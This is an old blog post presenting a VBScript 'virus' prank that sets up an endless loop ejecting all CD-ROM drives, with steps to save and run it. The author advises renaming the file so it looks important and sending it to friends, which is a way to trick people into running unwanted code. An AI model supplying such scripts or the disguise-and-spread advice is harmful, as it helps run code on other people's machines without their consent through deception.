Thursday, May 22, 2025

Wednesday, January 5, 2011

A Self-Made Virus That Will Open And Close Your Cdrom


WARNING !!! DONT TRY AT THIS AT HOME
Well,its a virus and a prank! you can even modify it.
Copy the below code into notepad and save it as virus.vbs or anyname.vbs
Remember to select Save as Type: All Types
When saved, double click to open it and see the magic!!!






Set oWMP = CreateObject(“WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
End If


Now if u want to disable this then go to Task Manager(Ctrl+Alt+Del), click on processes tab then find wscript.exe and end this process.
Rename it,so that it looks something important and then send it to all your friends to annoy them.

Related Articles :


    Stumble
    Delicious
    Technorati
    Twitter
    Facebook

    0 comments:

    Post a Comment

    Pages (51)1234 Next
     

    Computer tricks and Internet hacking Copyright © 2011 | THANK YOU | VISIT AGAIN